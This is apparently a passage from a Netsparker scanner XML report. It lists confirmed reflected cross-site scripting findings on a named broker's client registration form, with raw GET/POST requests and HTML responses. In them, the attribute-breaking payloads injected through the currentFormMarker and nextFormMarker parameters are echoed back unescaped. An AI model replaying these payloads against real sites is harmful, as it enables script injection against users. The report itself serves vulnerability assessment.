        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[TYPE]&quot; value=&quot;2&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0002A6)&lt;/script&gt;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>currentFormMarker</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0002C0)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 331
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=2&amp;aData%5BaccountKind%5D=200&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0002C0)%3c%2fscript%3e&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:26:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[TYPE]&quot; value=&quot;2&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[serviceProvider]&quot; value=&quot;BBAC47&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0002C0)&lt;/script&gt;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php?aData%5BaccountKind%5D=6&amp;aData%5BextManAnswer%5D=Yes&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BHTTP_REFERER%5D=3&amp;aData%5BmanagedAccountStrategy%5D=1ABEM3&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BSTRAT_REF%5D=-1&amp;aData%5BTYPE%5D=3&amp;backFormMarker=step1&amp;currentFormMarker=step2&amp;next=Next&amp;nextFormMarker=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057C)%3C/script%3E&amp;aData%5BaccountKind%5D=6&amp;aData%5BextManAnswer%5D=Yes&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BHTTP_REFERER%5D=https%3a%2f%2flive-login.dukascopy.com%2ffo%2fregister%2flive%2findex.php&amp;aData%5Bja0address%5D=3&amp;aData%5Bja0city%5D=3&amp;aData%5Bja0correspondanceAddress%5D=3&amp;aData%5Bja0country%5D=3&amp;aData%5Bja0dateBirth_day%5D=0&amp;aData%5Bja0dateBirth_month%5D=0&amp;aData%5Bja0dateBirth_year%5D=0&amp;aData%5Bja0EMAIL%5D=netsparker@example.com&amp;aData%5Bja0EMAIL_CONF_%5D=netsparker@example.com&amp;aData%5Bja0HOLDER%5D=3&amp;aData%5Bja0HOLDER_FIRST_NAME%5D=Ronald%20Smith&amp;aData%5Bja0HOLDER_LAST_NAME%5D=Ronald%20Smith&amp;aData%5Bja0lang%5D=french&amp;aData%5Bja0martialstatus%5D=Married&amp;aData%5Bja0mobilephone%5D=3&amp;aData%5Bja0nationality%5D=3&amp;aData%5Bja0NICKNAME%5D=Ronald%20Smith&amp;aData%5Bja0phone%5D=3&amp;aData%5Bja0placeBirth%5D=3&amp;aData%5Bja0privatefax%5D=3&amp;aData%5Bja0professionalfax%5D=3&amp;aData%5Bja0title%5D=Mrs.&amp;aData%5Bja0workphone%5D=3&amp;aData%5Bja0zipcode%5D=3&amp;aData%5BjointAccIndex%5D=0&amp;aData%5BmanagedAccountStrategy%5D=1ABEM3&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BSTRAT_REF%5D=-1&amp;aData%5BTYPE%5D=3</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>nextFormMarker</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00057C)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[GET /fo/register/live/index.php?aData%5BaccountKind%5D=6&amp;aData%5BextManAnswer%5D=Yes&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BHTTP_REFERER%5D=3&amp;aData%5BmanagedAccountStrategy%5D=1ABEM3&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BSTRAT_REF%5D=-1&amp;aData%5BTYPE%5D=3&amp;backFormMarker=step1&amp;currentFormMarker=step2&amp;next=Next&amp;nextFormMarker=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00057C)%3C/script%3E&amp;aData%5BaccountKind%5D=6&amp;aData%5BextManAnswer%5D=Yes&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BHTTP_REFERER%5D=https%3a%2f%2flive-login.dukascopy.com%2ffo%2fregister%2flive%2findex.php&amp;aData%5Bja0address%5D=3&amp;aData%5Bja0city%5D=3&amp;aData%5Bja0correspondanceAddress%5D=3&amp;aData%5Bja0country%5D=3&amp;aData%5Bja0dateBirth_day%5D=0&amp;aData%5Bja0dateBirth_month%5D=0&amp;aData%5Bja0dateBirth_year%5D=0&amp;aData%5Bja0EMAIL%5D=netsparker@example.com&amp;aData%5Bja0EMAIL_CONF_%5D=netsparker@example.com&amp;aData%5Bja0HOLDER%5D=3&amp;aData%5Bja0HOLDER_FIRST_NAME%5D=Ronald%20Smith&amp;aData%5Bja0HOLDER_LAST_NAME%5D=Ronald%20Smith&amp;aData%5Bja0lang%5D=french&amp;aData%5Bja0martialstatus%5D=Married&amp;aData%5Bja0mobilephone%5D=3&amp;aData%5Bja0nationality%5D=3&amp;aData%5Bja0NICKNAME%5D=Ronald%20Smith&amp;aData%5Bja0phone%5D=3&amp;aData%5Bja0placeBirth%5D=3&amp;aData%5Bja0privatefax%5D=3&amp;aData%5Bja0professionalfax%5D=3&amp;aData%5Bja0title%5D=Mrs.&amp;aData%5Bja0workphone%5D=3&amp;aData%5Bja0zipcode%5D=3&amp;aData%5BjointAccIndex%5D=0&amp;aData%5BmanagedAccountStrategy%5D=1ABEM3&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BSTRAT_REF%5D=-1&amp;aData%5BTYPE%5D=3 HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php?aData%5BaccountKind%5D=6&amp;aData%5BextManAnswer%5D=Yes&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BHTTP_REFERER%5D=&amp;aData%5BmanagedAccountStrategy%5D=1ABEM3&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BSTRAT_REF%5D=-1&amp;aData%5BTYPE%5D=3&amp;backFormMarker=&amp;currentFormMarker=step1&amp;next=Submit&amp;nextFormMarker=step2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: live-login.dukascopy.com
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:29:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
